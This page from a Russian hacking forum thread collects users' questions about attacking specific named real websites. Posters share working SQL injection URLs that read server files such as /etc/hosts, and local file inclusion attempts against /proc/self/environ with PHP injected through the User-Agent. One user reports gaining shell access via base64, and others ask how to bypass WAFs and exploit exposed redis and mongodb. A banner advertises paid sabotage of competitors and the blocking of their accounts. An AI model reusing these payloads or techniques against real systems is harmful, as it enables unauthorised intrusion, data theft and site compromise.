Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 12 из 296

« Первая

112

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#111

25.05.2015, 12:23

huntercs16

Участник форума

Регистрация: 07.10.2013

Сообщений: 140

С нами: 6630806

Репутация: 6

Помогите найти папку, в которой сайт лежит.

Перебрал стандартные httpd conf пути-не подходит.

http://sovita.ru/index.php?bpath=/m...t+1,2,3,4,5,6,7,load_file('/etc/hosts'),9+--+

#112

25.05.2015, 12:57

Br@!ns

Постоянный

Регистрация: 03.09.2010

Сообщений: 885

С нами: 8258006

Репутация: 25

http://www.sovita.ru/forum/support.php

Пасс в личку кинул

#113

25.05.2015, 14:28

huntercs16

Участник форума

Регистрация: 07.10.2013

Сообщений: 140

С нами: 6630806

Репутация: 6

Цитата:

Сообщение от Br@!ns

↑
http://www.sovita.ru/forum/support.php
Пасс в личку кинул

http://tele-club.ru/buyticket?event_...2,3,load_file("/etc/hosts"),5,6,7,8,9,10+--+;

А тут можно директорию определить?

/etc/passwd говорит о том что сайт может лежать в

/var/www/m.tele-club.ru/data/robots.txt

Но конкретно эту не хочет читать...

#114

25.05.2015, 15:13

Br@!ns

Постоянный

Регистрация: 03.09.2010

Сообщений: 885

С нами: 8258006

Репутация: 25

Цитата:

Сообщение от huntercs16

↑
http://tele-club.ru/buyticket?event_...2,3,load_file(
"/etc/hosts"),5,6,7,8,9,10+--+;
А тут можно директорию определить?
/etc/passwd говорит о том что сайт может лежать в
/var/www/m.tele-club.ru/data/robots.txt
Но конкретно эту не хочет читать...

{ШЕЛЛЫ тоже запрещено выкладывать, логины и пароли тоже} ps нахтак

Опять же, по базам лазить нужно, там пути искать, а не только пытаться инклудить конфиги

Пароли от форума или админки поискать, и сразу уже залиться.

/var/www/tele-club.ru/www/forum/ вот такой путь получился

#115

25.05.2015, 16:21

off

Познающий

Регистрация: 21.08.2006

Сообщений: 31

С нами: 10379845

Репутация: 21

Добрый день.

Есть сервер под управлением Ubuntu 12.04, на нем стоит mongodb 2.4.14 на которой настроена авторизация, но есть доступ. А так же redis 2.4.13, доступ тоже есть. В redis хранятся сессии от node.js (express.js).

Возможно ли каким-либо образом получить доступ к ОС ? Или прочитать файл .js (местоположение на сервере известно) или получить доступ к админке (путь известен и логин админа тоже).

По redis, нашел описание уязвимости по модификации местоположения файла dump.rdb (http://www.agarri.fr/kom/archives/20...sts/index.html), но эксплуатация не удается, файл создается но содержимое его видимо в бинарном виде.

#116

25.05.2015, 22:01

Br@!ns

Постоянный

Регистрация: 03.09.2010

Сообщений: 885

С нами: 8258006

Репутация: 25

.SpoilerTarget" type="button">Spoiler: link
http://www.inkaddict.com/search.php
Можно как нибудь это заиспользовать?

И что тут можно сделать?

http://visotsky.org/ru/search?q=(dsfsdf

#117

26.05.2015, 16:41

Br@!ns

Постоянный

Регистрация: 03.09.2010

Сообщений: 885

С нами: 8258006

Репутация: 25

куча waf всяких. Можно как нибудь обойти на нормальный вывод?

http://scdistribution.com/resources.html?q_release=-2015-05-12'+or+substring(@@version,1,1)=5+--+

и все равно ругается на многие комбинации.

#118

27.05.2015, 19:48

huntercs16

Участник форума

Регистрация: 07.10.2013

Сообщений: 140

С нами: 6630806

Репутация: 6

Цитата:

Сообщение от None

http://bramki.eskat.com.pl/index.ph.../././././././././././././././././././././././

При постановке данных в куки и Юзер агент работает phpinfo(), но не осмысленный код, который позволяет залиться.

Пробовал в куки ставить

Опять же сложный код не работает

Что сделать можно?

$_POST[c]=/*$s='/home/virtualki/18281'*/;echo '111';echo 222; = работает

$_POST[c]=$s='/home/virtualki/18281';echo '111';echo 222; =не работает

echo('111');echo 222; -работает

Залился, помог base64

#119

27.05.2015, 23:11

Sleep

Участник форума

Регистрация: 31.10.2007

Сообщений: 193

С нами: 9752260

Репутация: 150

Можно было попробовать еще через

/proc/self/environ

в User-agent например вставляешь php код

#120

28.05.2015, 18:49

huntercs16

Участник форума

Регистрация: 07.10.2013

Сообщений: 140

С нами: 6630806

Репутация: 6

Код:

http://pelczar.rzeszow.pl/duszpasterstwoszpitala/index.php?action=aktualnosci/../../../../../../../../../../../../../../../proc/self/environ/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

Тоже енвайрон. Что сделать можно?

В данном случае base64 не помог

Страница 12 из 296

« Первая

112

Последняя »

Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход